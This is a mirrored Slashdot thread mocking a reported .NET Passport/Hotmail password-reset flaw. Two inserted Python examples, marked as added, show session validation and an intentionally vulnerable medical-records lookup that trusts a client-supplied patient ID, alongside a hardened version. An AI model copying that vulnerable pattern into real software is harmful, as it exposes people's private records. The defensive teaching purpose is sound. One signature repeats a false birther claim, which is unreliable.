Slashdot Mirror


Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

318 of 433 comments

  1. Remember... by stu_coates · · Score: 5, Funny

    Remember folks, this is Trustworthy Computing! ;-)

    1. Re:Remember... by Anonymous Coward · · Score: 5, Informative

      According to a Dutch news site this hole was fixed shortly after the posting... So that's the way to talk to Microsoft.....

      nu.nl for people who know how to read Dutch (no, NOT German)..

    2. Re:Remember... by rf0 · · Score: 3, Funny

      I wouldn't trust them to feed my fish.

      Rus

    3. Re:Remember... by ctellefsen · · Score: 5, Insightful

      It's a good thing that (according to M$ ads) the hacker is an endangered species, so that there is no one around to exploit this exploit.

      Current score: XBox is hacked, Passport is insecure, SQL Server is beset by worms, and I won't even mention all the holes found over the years in IE and Outlook.

      Welcome to the age of untrustworthy computing...

    4. Re:Remember... by Gortbusters.org · · Score: 5, Funny

      That's one degree of difference with .NET!

      --
      --------
      Free your mind.
    5. Re:Remember... by m00nun1t · · Score: 4, Informative

      I fully agree this passport problem is a lame & inexcusable fault that should never, ever have happened.

      However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

      The only product that is really valid to criticise under the trustworthy computing tag is Windows Server 2003 - if that has big problems, then trustworthy computing has failed. But don't drag up old products/services.

    6. Re:Remember... by jkrise · · Score: 4, Funny

      " according to a dutch news site this hole was fixed shortly after the posting... "

      If sending 404 Page Not Found messages to users trying to update passwords can be called fixing, well, MS indeed fixed it.

      --
      If you keep throwing chairs, one day you'll break windows....
    7. Re:Remember... by beuges · · Score: 2, Insightful

      So does that mean they can get away with ignoring bugs in software that can expose personal details and credit card numbers to anyone?

      I think that if they were aware of the problem (and they were, apparently the finder mailed them 10 times), chose not to fix it, and some poor person had their credit card number exposed and abused, I think that Microsoft should be taken to the cleaners. Online security is something that must constantly be looked at, and maintained and updated. It's for their own good, really - if they don't fix it, they'll end up the dumbasses, cos people will lose their trust in the Passport system, and use other means for online transactions.

    8. Re:Remember... by jkrise · · Score: 1

      Actually it's Microsoft Next Generation Secure Computing Passport.Net Services Platform (XML) .Net #++ (TM).

      --
      If you keep throwing chairs, one day you'll break windows....
    9. Re:Remember... by mbourgon · · Score: 4, Funny

      MS has admitted that Trustworthy Computing has nothing to do with security. It's all about whether you trust Microsoft. Do you trust them enough to give them money? If so, they've met their goals.

      --
      "Sometimes a woman is a kind of religion, she can save your soul & set you free from all your sins" - Bad Examples
    10. Re:Remember... by prinzip · · Score: 1

      Yeah but you seem to forget that Hotmail is on Windows Server 2003...

      --
      Bombing for peace is like fucking for virginity!
    11. Re:Remember... by m00nun1t · · Score: 1

      No it doesn't mean they can get away with it. The part of my post that said "it's inexcusable" kinda hinted at that. My point is simply to not drag trustworthy computing into this, that's all.

    12. Re:Remember... by frankthechicken · · Score: 2, Informative

      I don't know, this still seems to work.

    13. Re:Remember... by ConceptJunkie · · Score: 5, Insightful

      Why should Microsoft be "taken to the cleaners", when their EULAs state that any similarity between the software they sell and what they claim they are selling is purely coincidental.

      See Microsoft has this liability thing all sewn up. All they have to do is "Just trust us." and then in the fine print it says "But if we screw up, you can't hold us responsible."

      They want it both ways, and they seem to have gotten it.

      --
      You are in a maze of twisty little passages, all alike.
    14. Re:Remember... by ConceptJunkie · · Score: 4, Interesting

      But where's the public outrage?

      We on /. regularly vent our spleens (including me, and I'm a Microsoft user myself) about this blatantly bad situation, but Microsoft continues to prevail, and except for the occasional story, there really seems to be no negative impact on their business (much of which seems to be spinning their abysmal record in "trustworthiness").

      Hackers are only an endangered species because it hardly takes a hacker to break MS code these days.

      --
      You are in a maze of twisty little passages, all alike.
    15. Re:Remember... by plague3106 · · Score: 1

      Considering the security record of every product they ever made....why should we believe that 'trustworthy' computing will be any different? Because they said so? Please..

    16. Re:Remember... by beuges · · Score: 1

      If a company has a system which contains personal and financial information of their clients, and that system has a bug, and the company chooses not to fix the bug, simply because they are focusing on new products, and not on fixing security flaws in their older products, which would end up having a potentially huge financial impact on the innocent users who are affected by that bug, then I would not trust that company with my personal information. I.e., I would deem that company to be untrustworthy.

      A trustworthy system is one which the users trust. Trustworthiness and security go hand-in-hand. The fact that they ignored the bug-finder's 10 emails informing them of the vulnerability makes the public lose their trust in the company. Microsoft cannot claim to be trustworthy if their customer-/user-base does not trust them with their information.

    17. Re:Remember... by hpulley · · Score: 1

      > It's for their own good, really - if they don't fix it, they'll end up the dumbasses, cos people will lose their trust in the Passport system, and use other means for online transactions.

      What, you mean someone HAS trust in Passport? Wow...

      --
      $#!^ happens, but why does it always have to happen to me???
    18. Re:Remember... by mark_lybarger · · Score: 1

      just because Mr Gates has recently begun to use the term "trustworthy computing" to describe how they intend to build software systems is irrelevant to the OP. a software vendor that is aware of a security hole that can be exploited to harm the consumer MUST resolve that problem, and IMHO should issue a product recall the same as the manufacturer of a child safety seat, or an automobile, or any other goods and services provider. if you build something that's hazardous to the consumer under normal usage, you're responsible to fix it (talk to firestone/ford).

      so whether or not it will be termed trustworthy computing or not, these issues MUST be fixed. for some reason, software vendors think they can put a simple "we're not responsible for anything" message in their license and absolve themselves from any damages caused by normal usage of their product. this is plain wrong.

    19. Re:Remember... by Reziac · · Score: 3, Informative

      Not fixed -- per the articles (which, sadly, I did read) they just shut down the function that allows users to change their password.

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    20. Re:Remember... by SEWilco · · Score: 1

      When you are both .NET people, that is zero degrees of difference. The distance to zero degrees of difference is one URL.

    21. Re:Remember... by arkanes · · Score: 1

      Server 2003 is supposedly the first product that benefited from the new processes and reviews that are part of the whole trustworthy computing. In its favor, it's a vast improvement over past servers (ships locked down by default, rather than wide open). So I'll hold off judging their new commitment to security until I see what 2003 looks like. In the meantime, I'll still bitch and complain about their old, crappy commitment to security.

    22. Re:Remember... by kawika · · Score: 1

      Why is this modded funny? It's insightful. Security is hard to measure quantitatively so there will be some degree of judgement involved. Good PR can help to influence your judgement. (Well, not the typical /. judgement of Microsoft but you know what I mean.)

    23. Re:Remember... by Black+Copter+Control · · Score: 1
      . . . . But many UNIX vendors eventually cleaned up their act and started putting out secure systems, it is not impossible that microsoft could do the same. . . . .

      Unix was insecure back when people were working on an assumption that 'the net' was a secure place where all the admins pretty much knew each other within 2 or 3 degrees of separation. The Great Morris worm of 1988 is generally considered the 'great wakeup call' for the Unix community.

      If Windows 2003 is the first MS product to benefit from their 'bourne again' focus on security, then this means it pretty much took 15 years for MS to 'realize' that security was a real issue worth addressing. Perhaps, in 5 years or so, they'll have caught up with the Unix community.

      It looks to me like MS doesn't consider security a good idea on its own terms. They consider security to be a marketing issue. It was only when security issues threatened their market dominance that they took it with any seriousness. If it ever ceases to be a marketing issue (i.e. if they ever manage to 'put Linux down'), then I expect that it will, once again, wane in their focus.

      --
      OS Software is like love: The best way to make it grow is to give it away.
    24. Re:Remember... by iabervon · · Score: 1

      Their EULA doesn't prevent you from suing them (in the US, you can't forfeit this right even intentionally); it just prevents you from winning. But really, winning such a lawsuit would be about as bad for Microsoft as losing. They don't really want it to become a matter of precedent and public record that, when using Microsoft software, you are exposing yourself to huge risks with no protection. It's in the fine print, but it hasn't so far been in the national headlines. On the other hand, if Microsoft loses or settles such a suit, that's just money, and they have plenty of that.

    25. Re:Remember... by pod · · Score: 1

      It's still a lame reason. Hotmail isn't a single point release product. It won't be replaced with Hotmail 2003. What was the point of the security PR stunt if not to improve existing processes? And why would you say Hotmail and Passport won't benefit from the secure computing initiative?

      --
      "Hot lesbian witches! It's fucking genius!"
    26. Re:Remember... by EvilTwinSkippy · · Score: 2, Insightful
      Hackers are only an endangered species because it hardly takes a hacker to break MS code these days.

      I think the theory is, that by having so much low-hanging fruit, M$ is hoping that the next generation of hackers will be as complacent as the present user base.

      Well, at least take the shine off of 0w#!n@ a system. It used to be a challenge. Now it's just annoying.

      --
      "Learning is not compulsory... neither is survival."
      --Dr.W.Edwards Deming
    27. Re:Remember... by jpetts · · Score: 1

      However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

      The cynical amongst us would probably interpret this as yet another way of trying to force people to upgrade.

      --
      Call me old fashioned, but I like a dump to be as memorable as it is devastating - Bender
    28. Re:Remember... by Anonymous Coward · · Score: 1, Insightful

      Yeah, whenever M$ does something, the magazines and message boards are FULL of angry posts from CxO's and folks who are upset.

      Then after a while, it all dies down, and nobody switches to Linux or does anything else about it.

      Why?

      Because IT COSTS TOO MUCH TO SWITCH. I see it all the time. My boss HATES microsoft but can't pay to move all the apps to Linux, and can't force the clients to switch.

      Microsoft can do ALMOST anything and the worst that happens is they shed a few small business customers.

      AVOID LOCK IN! If you're starting a business, base it around Free software with a few Macs and Windows on the edge, it costs A LOT LESS to move from one free software vendor to the other.

    29. Re:Remember... by morleron · · Score: 1

      Yet another security flaw from a company that is trumpeting its "dedication to security" in its marketing hype. What is it about MS that makes people think they'll ever get this sort of thing right? Not only do they have compromises in current products, but their on-the-drawing-board "Longhorn" project promises to be a tar pit of security issues.

      MS needs to realize that making everything from file handling to Internet browsing an intrinsic part of an OS is not the way to achieve either security or stability. With OS architectures that resemble a bowl of spaghetti it's no wonder that the list of security problems continues to get longer every day. There is evidently no way that MS can remove, or even limit the effect of, the security problems that their products are subject to.

      Before you MS apologists start pointing out that Open Source software has problems, too, I'll gladly stipulate that. However, there are several ways in which those problems differ from the ones that MS inflicts on Joe Average computer user. First, given the loosely coupled nature of UNIX/Linux a security problem in an application does not affect the operation of the OS itself. Even problems within the kernel itself are generally easy to fix as the OS doesn't try to do everything under the sun. Fixing those is much easier (and faster) than when a problem is part of a piece of an application that is part of something else, that is connected to the OS via a lot of tightly-wrapped code.

      Also, the Open Source community has not, that I'm aware of, ever claimed that "security is job one." Instead, by releasing the code and allowing others to make changes and re-distribute the modified code, a lot of potential problems are taken care of early in the release cycles. In keeping with the philosophy that code should be available the Open Source community doesn't waste time denying the existence of problems or trying to cover them up. Instead, the problems are quickly fixed, the modified code is rapidly made available, and systems are patched, generally without having to schedule downtime as, for most fixes, the machines, be they desktop or server, don't need to be rebooted once the patch is applied. I dare say, that because of the "transparency" of the patch process, the average UNIX/Linux system is more current with patches than the average Windows machine. I don't have hard numbers for that, but my experience in mixed MS and UNIX/Linux shops gives me that impression.

      The bottom line is that MS can keep its products as far as I'm concerned. People, albeit slowly, seem to be realizing that MS is not capable of producing software that is reliable, secure, and easy to patch when fixes are needed. I suspect that realization has a lot to do with the growing popularity of Linux and other Open Source OSes and products.

      Just my $.02,
      Ron

      --
      Impeach Barack Obama for violating the Constitutional requirement to be a "natural born" citizen to hold the office of P
  2. Oh my God (Mad scramble) by LookSharp · · Score: 5, Funny

    Ahhh! I have to go change my Passport profile and take out all those credit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

    Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past... /obvious

    1. Re:Oh my God (Mad scramble) by grarg · · Score: 1

      No need. register.passport.net seems to be completely down at the moment; I guess MS copped on.

      --
      The conclusion of your syllogism, I said lightly, is fallacious, being based on licensed premises
    2. Re:Oh my God (Mad scramble) by Anonymous Coward · · Score: 5, Funny

      I have to go change my Passport profile and take out all those credit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

      Don't bother, I just did it for you.

    3. Re:Oh my God (Mad scramble) by twelveinchbrain · · Score: 2, Interesting

      I know you're being sarcastic, but if I'm not mistaken, MSN subscribers also sign in with Passport. This would mean that anyone who happened to use MSN as their ISP can have their personal information stolen. It's not so unreasonable for a person to expect their private, personal emails to remain private.

      --
      Not Found
      The requested URL /signature.html was not found on this server.
    4. Re:Oh my God (Mad scramble) by kharchenko · · Score: 2, Interesting

      I remember reading notes of some poor fellow who was involved in trying to get MS to fix some hotmail backdoor a while ago. Even though he wasn't in any way responsible for finding the hack, years on end he received e-mails like this:

      Dear Xxxx,
      It's terribly important for me to hack into an account of Yyyy !
      Please understand, she's my girlfriend, and I think she might be cheating on me.
      Please tell me how to do this ... please, please ...


      Now every time I read about another hotmail hack, I can't help but think how many ticklish revelations will happen today :)

    5. Re:Oh my God (Mad scramble) by Fishstick · · Score: 1

      Taco tells this story in his journal

      From: NAME DELETED
      Subj:
      rob,
      i read that you know the web site address to view peoples mail in hotmail. i really think my
      boyfriend is cheating on me, he is extremely secretive, especially about his e-mail. please please
      can you give me the address to put my mind at ease.

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

  3. As lame as it sounds... by Anonymous Coward · · Score: 5, Funny

    ...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....

  4. 404 error by uberdood · · Score: 2, Informative

    Er, already fixed. I get a 404 error when I go there (with appropriate e-mail addresses).

    --
    "Population 1,656"
    1. Re:404 error by bailout911 · · Score: 1, Interesting

      Yeah, but you can clearly see that it's not a "standard" 404 page generated by either IIS or apache. Viewing the page source reveals Microsoft's fix:

      --Begin Page Source--

      404 not found

      --End Page Source--

      That's right, not even a "real" 404, just a text file claiming to be a 404.

      --
      --Stupid Sig Here--
    2. Re:404 error by jlanng · · Score: 2, Insightful

      It returns an HTTP status of 404, so it is a proper 404

    3. Re:404 error by FinalCut · · Score: 1

      It's amazing to me how quickly ignorance rears its ugly head when you hate something.. what is the point of this post other than to show that you don't know what you're talking about?

  5. Security flaw in Passport!!!! by grahamlee · · Score: 5, Funny

    In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.

    1. Re:Security flaw in Passport!!!! by jkrise · · Score: 2, Funny

      "the England cricket team haven't won anything"

      I thought they won a moral victory by not travelling to Zimbabwe... and a political victory by making Zim fly to England. Bad example?

      --
      If you keep throwing chairs, one day you'll break windows....
    2. Re:Security flaw in Passport!!!! by rifter · · Score: 3, Funny

      twice two is four

      It seems you are overdue for your appointment at miniluv, thought criminal!

    3. Re:Security flaw in Passport!!!! by Xeleema · · Score: 1

      Invader Zim Rocks!! (I know, I know. OT, but I couldn't resist)

      --
      "When I am king, you will be first against the wall..."
  6. Oh no, not again... by girl_geek_antinomy · · Score: 5, Insightful

    The depressing thing is, it's such a simple exploit...

    Oh dear. When are people going to start *thinking* before they add usability features to web services willy-nilly...? Hopefully at least the fact that this is so high-profile will make others think hard about their own password-resetting systems.

    When I was working on an e-commerce site, I remember us all sitting around spending literally hours plotting out exactly what who would be able to do what with it. It's just common sense, surely?

    1. Re:Oh no, not again... by Anonymous Coward · · Score: 1, Funny

      Microsoft hires only "geniuses", i.e., no common sense whatever!

    2. Re:Oh no, not again... by Twanfox · · Score: 1

      Something on any programmer's mind when actually writing a program should be "How can I break this?"

    3. Re:Oh no, not again... by EvilTwinSkippy · · Score: 1
      Hell, I wrote a website for a volunteer organization with more security than that in my spare time!

      I have a Kerberos-like session management system. After authentication, the browser gets a cookie with its authorization ticket. The ticket is surrendered every page view, and validated against a database of open sessions.

      No session, expired session, illegal session, go back to the login page. The whole thing is 7000 lines of code in TCL, including my SQL library routines.

      Think: someone was paid to develop M$'s system.

      --
      "Learning is not compulsory... neither is survival."
      --Dr.W.Edwards Deming
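The scheme the comment describes, written out as an added example in Python (it is not the poster's TCL code, and nothing here comes from Passport or Hotmail): an opaque ticket is issued after login, handed back on every page view, and checked against a server-side table of open sessions, with no session, an unknown session or an expired session all sending the browser back to the login page. The names SessionStore and handle_page_view, the 30-minute idle timeout, and the in-memory dict standing in for the poster's SQL table are all assumptions; the injectable clock is there so expiry can be exercised without waiting.

```python
import hashlib
import secrets
import time

# Constructed value: idle timeout after which a ticket is no longer honoured.
SESSION_TTL_SECONDS = 30 * 60


def _fingerprint(ticket):
    # Store only a hash of the ticket, so a copy of the session table
    # does not hand out usable tickets.
    return hashlib.sha256(ticket.encode("utf-8")).hexdigest()


class SessionStore:
    """Server-side table of open sessions (stands in for the SQL table in the post)."""

    def __init__(self, now=time.time):
        self._now = now           # injectable clock so expiry can be tested
        self._sessions = {}       # fingerprint -> {"user": str, "expires": float}

    def open(self, user):
        """Issue an opaque, random ticket after authentication has succeeded."""
        ticket = secrets.token_urlsafe(32)   # 256 bits of randomness; nothing to guess or edit
        self._sessions[_fingerprint(ticket)] = {
            "user": user,
            "expires": self._now() + SESSION_TTL_SECONDS,
        }
        return ticket

    def validate(self, ticket):
        """Return the user behind a live ticket, or None if it is missing, unknown or expired."""
        if not ticket:
            return None                       # no session
        key = _fingerprint(ticket)
        entry = self._sessions.get(key)
        if entry is None:
            return None                       # illegal session: never issued, or already closed
        if entry["expires"] <= self._now():
            del self._sessions[key]           # expired session: purge it
            return None
        entry["expires"] = self._now() + SESSION_TTL_SECONDS   # sliding expiry on use
        return entry["user"]

    def close(self, ticket):
        """Logout: forget the ticket server-side so a copied cookie stops working too."""
        self._sessions.pop(_fingerprint(ticket), None)


def handle_page_view(store, cookies, page):
    """Check run on every page view: any failure sends the browser to the login page."""
    user = store.validate(cookies.get("ticket"))
    if user is None:
        return ("redirect", "/login")
    return ("ok", f"{page} for {user}")


if __name__ == "__main__":
    store = SessionStore()
    ticket = store.open("alice")
    print(handle_page_view(store, {"ticket": ticket}, "/inbox"))   # served
    print(handle_page_view(store, {}, "/inbox"))                   # no cookie -> login
    store.close(ticket)
    print(handle_page_view(store, {"ticket": ticket}, "/inbox"))   # closed -> login
```

The point of keeping the session table on the server is that the cookie carries nothing but a random lookup key: the user name and expiry live where the client cannot edit them, and a logout or expiry takes effect immediately for every copy of the cookie.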
    4. Re:Oh no, not again... by epsalon · · Score: 1

      I found a similar exploit on a local Health Care Provider website. On one hand, they used Verisign digital certificates for patients on strong-encrypted SSL, but on the other hand failed to check that an ID number submitted by a hidden field in a form to get medical results (sensitive medical data) is the same one in the digital certificate. So, one could easily see any patient's medical results, even if they were not registered for the internet service at all!
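The mismatch described above, as an added example in Python that is not code from the provider's site or from the poster: the request is authenticated by a verified client certificate, but the record returned is chosen by a hidden form field the client controls, and the hardened version beside it selects the record from the certificate identity and refuses (and logs) any form id that disagrees. The record table, the certificate subject shape ({"CN": "P-1001"}), the audit list and all function names are constructed for the illustration.

```python
import hmac

# Constructed sample records keyed by patient id; stands in for the provider's database.
RESULTS = {
    "P-1001": "patient P-1001: lab results",
    "P-1002": "patient P-1002: lab results",
}

# Constructed audit trail: one entry per refused cross-patient request,
# which is the event a defender would want to alert on.
AUDIT_LOG = []


def patient_id_from_cert(cert_subject):
    """Identity asserted by the verified client certificate (constructed shape: {"CN": "P-1001"}).

    In a real deployment this comes from the TLS layer after chain validation,
    not from anything the browser can put into a form field.
    """
    return cert_subject["CN"]


def fetch_results_vulnerable(cert_subject, form):
    """The flaw in the post: authenticated by certificate, but the record
    is picked by a hidden form field, so any patient's results come back."""
    return ("200", RESULTS[form["patient_id"]])


def fetch_results_hardened(cert_subject, form):
    """Fix: the record is selected by the certificate identity; a form id that
    disagrees with it is refused and logged rather than honoured."""
    owner = patient_id_from_cert(cert_subject)
    requested = form.get("patient_id", owner)
    if not hmac.compare_digest(requested, owner):
        AUDIT_LOG.append(f"cert {owner} requested record {requested}: denied")
        return ("403", "forbidden")
    if owner not in RESULTS:
        return ("404", "no record")
    return ("200", RESULTS[owner])


if __name__ == "__main__":
    cert = {"CN": "P-1001"}                     # constructed: certificate for patient P-1001
    tampered = {"patient_id": "P-1002"}         # constructed: hidden field pointing at another patient
    print(fetch_results_vulnerable(cert, tampered))  # leaks P-1002's results
    print(fetch_results_hardened(cert, tampered))    # ("403", "forbidden")
    print(fetch_results_hardened(cert, {}))          # own results
    print(AUDIT_LOG)
```

The hidden field is not needed at all once the server derives the patient from the certificate; keeping the comparison rather than silently ignoring the field has the advantage that a tampered request becomes a logged, alertable event instead of an invisible one.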

  7. A legitimate use? by Gleeb · · Score: 2, Informative

    Thank the lord for POP ;)

    1. Re:A legitimate use? by Bendy+Chief · · Score: 1
      Indeed. I just recently fully migrated from my abominable Hotmail address to my POP3. I can't believe how bad Hotmail's gotten, between popups, appending service ads to your outgoing mail, changing their login screen to be full of (guess what) ads, and not letting you correctly apply your own spam filters.

      No indeedy! If I want to redirect mail with my own filters, I can't actually send it to the size-unrestricted Junk Mail folder!

    2. Re:A legitimate use? by pldms · · Score: 1

      Indeed. I just recently fully migrated from my abominable Hotmail address to my POP3. I can't believe how bad Hotmail's gotten, between popups, appending service ads to your outgoing mail, changing their login screen to be full of (guess what) ads, and not letting you correctly apply your own spam filters.

      Agreed. I've been a hotmail user since the pre-Microsoft days, but now use another account. However you can forward mail easily using Gotmail if you want to keep an eye on it.

      --
      Slashdot looked deep within my soul and assigned
      me a number based on the order in which I joined
    3. Re:A legitimate use? by Bendy+Chief · · Score: 1

      Thank you kindly, sirrah, from another pre-MS Hotmail user who's cried at their meteoric fall from grace. ;)

  8. The Microsoft Information Minster Says: by retards · · Score: 5, Funny

    We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!

    1. Re:The Microsoft Information Minster Says: by retards · · Score: 1

      What's an AC?

      Thanx, anyway!

    2. Re:The Microsoft Information Minster Says: by Amarok.Org · · Score: 1
      I believe nothing you say without a triple-guarantee!

      --
      -- "Other than that, how was the play Mrs. Lincoln?"
    3. Re:The Microsoft Information Minster Says: by Lairdsville · · Score: 1
      Apparently, the only answer Muhammad Faisal Rauf Danka got after multiple unsuccessful attempts to contact Microsoft was:

      "Bugs? There are no bugs. We have destroyed two bugs, two anomalies, and a misspelling. We have driven them back. I guarantee you, there are no bugs in our software. Those who say there are bugs, (dramatic pause) THEY are the bugs. All they tell is lies, lies, and more lies! - Thank you for calling Microsoft support. (click)"

      (as sent by Richard Berry to welovetheiraqiinformationminister http://64.39.15.171/index.html#quotes)

    4. Re:The Microsoft Information Minster Says: by FuzzyBad-Mofo · · Score: 1

      Penguins aren't Donkeys, stop messing with my mind!

  9. now be fair by Joe+the+Lesser · · Score: 4, Funny

    unsuccessful attempts to contact Microsoft.

    It's not their fault Outlook kept crashing, right?

    --
    "I only speak the truth"
    Karma: null(Mostly affected by an unassigned variable)
    1. Re:now be fair by jkrise · · Score: 1

      "It's not their fault Outlook kept crashing, right?"

      Nope... actually support@hotmail.com was taken over by rms-gnu@hotmail.com
      The GNU team folks are promising a fix faster than MS, provided they can make the entire code GPL!

      --
      If you keep throwing chairs, one day you'll break windows....
    2. Re:now be fair by deranged+unix+nut · · Score: 1

      This *really* makes me wonder how they attempted to contact Microsoft.

    3. Re:now be fair by Fulcrum+of+Evil · · Score: 1

      The GNU team folks are promising a fix faster than MS, provided they can make the entire code GPL!

      Hey, that's fine. Only problem is that, since they never distribute the product (it's a service), they're under no obligation to pass around the source.

      --
      "We returned the General to El Salvador, or maybe Guatemala, it's difficult to tell from 10,000 feet"
  10. Ruh Roh Raggy by Ralph+Wiggam · · Score: 4, Funny

    Holy Crap!

    If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

    With .NET, there's only one degree of separation between me and evil crackers.

    -B

    1. Re:Ruh Roh Raggy by archen · · Score: 5, Funny

      If you have a penis AND breasts (and feel the need to enlarge them) you probably really do have a lot of secrets...

    2. Re:Ruh Roh Raggy by tanveer1979 · · Score: 1

      If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

      Wow that would be bad, after all you must be a real miracle since you got both! ;-)
      --
      My Aurora : http://www.youtube.com/watch?v=o91ZsGwJYyg
      FB : https://www.facebook.com/TanveersPhotography
    3. Re:Ruh Roh Raggy by darkov · · Score: 1

      If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

      Using said exploit I can now reveal your secrets:

      To have larger breasts: eat lots of fatty food.
      To make your penis larger: look at heaps of filthy porn.

      I have tested these and they work.

    4. Re:Ruh Roh Raggy by phorm · · Score: 1

      A lot of programmers have both. You try sucking down twinkies and jolt all day and see if you don't start developing breasts to go along with that spare tire around your waist...

    5. Re:Ruh Roh Raggy by floydigus · · Score: 1

      Plenty of people exist with both. No miracle, just unusual.

      --

      All things in moderation; including moderation

  11. good by Nevrar · · Score: 5, Funny

    "...the victim's accounts..."

    It's nice to see people are finally realising that Passport/Hotmail users are victims. ;)

    --
    Nevrar
  12. Oh no by Rik+Sweeney · · Score: 5, Funny

    A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account

    But that spam is personal to me. It's not for anyone else.

  13. Can someone explain this? by jkrise · · Score: 5, Insightful

    "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. "

    I fail to u'stand what Microsoft .NET Passport means. I only know Hotmail said:
    In 1999: Login to Hotmail
    In 2000: Login to Passport
    2001 and later: Login to .Net

    Nobody seems to know what the hell .Net is all about (including MS). Visual Studio .Net is the only branded .Net product out there, and Hotmail is supposed to be on .Net, whatever that means.

    Is Passport or Passport.Net used by any other service except Hotmail? Terribly confusing.

    --
    If you keep throwing chairs, one day you'll break windows....
    1. Re:Can someone explain this? by Anonymous Coward · · Score: 5, Funny

      I believe that .NET was the cause of the .COM crash. The shit hit the fan around the same time. What a catalyst !

    2. Re:Can someone explain this? by Anonymous Coward · · Score: 1, Informative
      Nobody seems to know what the hell .Net is all about (including MS).
      Lots of people understand what it's about. I use it every single day. Perhaps what you mean is that you don't understand what it's about. In that case, go to http://www.microsoft.com/net/ and look around.
    3. Re:Can someone explain this? by Kredal · · Score: 2, Funny

      So if I start the .ORG service, can I kill the .NET system?

      So who wants to join the .ORG at my place next friday? (:

      --
      Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
    4. Re:Can someone explain this? by Schnapple · · Score: 2, Informative
      I'm going to use this opportunity to blatantly plug an article I wrote on this topic on what .NET is and what .NET isn't. And yes that's a Tripod link, so turn on your popup blockers.

      But the short answer to your question is that yes, the overkill of .NET branding has muddied and confused the perception of what .NET is. But hey, everyone in the world knows the name, so mission accomplished?

    5. Re:Can someone explain this? by LordKronos · · Score: 1

      So who wants to join the .ORG at my place next friday
      You'll probably get more takers with a .ORGY

    6. Re:Can someone explain this? by weave · · Score: 1
      Yeah, ok, I went there, read it, still confused. Sounds like it'd be easier to define what .NET is .NOT than what it .IS

      It's about as clear as going to a biology/chemistry lecture and not understanding a thing. Yeah, I'm sure they all know what an RNA is, but I'm lost and don't care.

      So why should I care about .NET either?

    7. Re:Can someone explain this? by jkrise · · Score: 1

      "I use it every single day."
      You mean, you use Hotmail?

      After reading your referenced site, I've come to the conclusion:
      The Benefit of .Net is XML
      and
      XML can be done without .Net.

      If anything, I'm more confused.

      Thanks for a very instructive link.

      --
      If you keep throwing chairs, one day you'll break windows....
    8. Re:Can someone explain this? by jkrise · · Score: 1

      "the overkill of .NET branding has muddied and confused the perception of what .NET is."

      And yet you've written a thousand words to reach the same conclusion! Brilliant!!

      "But hey, everyone in the world knows the name, so mission accomplished?"

      You mean, the mission was to confuse everyone in the world, including Microsoft? Well, you can be sure that was accomplished long ago, with Service Packs.

      --
      If you keep throwing chairs, one day you'll break windows....
    9. Re:Can someone explain this? by Schnapple · · Score: 1
      And yet you've written a thousand words to reach the same conclusion! Brilliant!!
      Actually the thousand words cover more than that. The conclusion I wrote there merely covers the first few paragraphs.
      You mean, the mission was to confuse everyone in the world, including Microsoft?
      The mission was name brand recognition, which to marketing gurus is the most important thing in the world.

      Witness how Infogrames yesterday changed their name to Atari. Sit back and watch how many people will now think that Atari is the exact same company that made the 2600. Heck, when Hasbro made Atari branded games I worked in a software store and people would ask us if they needed "their old Atari" to play these new CD-ROM games.

      Your average person probably thinks J2EE is an engineering agency, but if they use Hotmail they think that they use .NET every day. Microsoft learned long ago that there's no such thing as bad publicity - mission accomplished.

    10. Re:Can someone explain this? by TheOneEyedMan · · Score: 1

      As I understand it, .Net is a XML based communication platform for connecting just about any device you can imagine. For now, that is mostly desktops and servers, but later phones, fridges, and TVs.
      To the user it looks like nothing, which is why you probably do not know what it is. To the programmer, it looks like a set of libraries. To the hardware manufacturers, it looks like a formatted data stream.

      --
      Reality is that which refuses to go away when I stop believing in it. --Phillip K. Dick (remove SPAM to email)
    11. Re:Can someone explain this? by penguinrenegade · · Score: 1

      YES - eBay uses .net passport to log in. It's the only one I know of, but it DOES exist. Someone could ruin your eBay rating you worked a LONG time to get if they could get into your .net passport. Just a thought.

    12. Re:Can someone explain this? by Reziac · · Score: 1

      Will ORG be written in ASM??

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    13. Re:Can someone explain this? by geniusj · · Score: 1

      .NET is mainly a bytecode interpreter (virtual machine). However, multiple languages (mostly Microsoft languages) can be compiled into that bytecode, meaning that you can take portions of code written in VB and 'integrate' it with code you've written in C# or Visual C++. That's how it's supposed to work anyway. It's not a terrible idea, but apparently the VM doesn't fit well for all languages. For an open source version of this, look to Parrot ( http://www.parrotcode.org ). I have high hopes for it.. I think .NET might be used by MS in other meanings as well, but I think this is the main component.

      Cheers,
      -JD-

    14. Re:Can someone explain this? by FuzzyBad-Mofo · · Score: 1

      Obviously, you think that you know what .NET's all about. But do you really? I know about Visual Studio.NET, but that's not the whole story here. Is .NET any more than a marketing scheme? Why don't you enlighten us?

    15. Re:Can someone explain this? by indiigo · · Score: 1

      Don't forget .net the programming platform. .net the server platform. .net hailstorm .net the often changed philosophy over the last 4 years at MS. Anyone outside MS explain this completely I'll give you a cookie. .net the tld domain ...

      --
      fslg503-985-8686503-985-8686503-985-8686503-985-86 8650 3-985-fdsg8686503-985-8686503-985-8686503-9
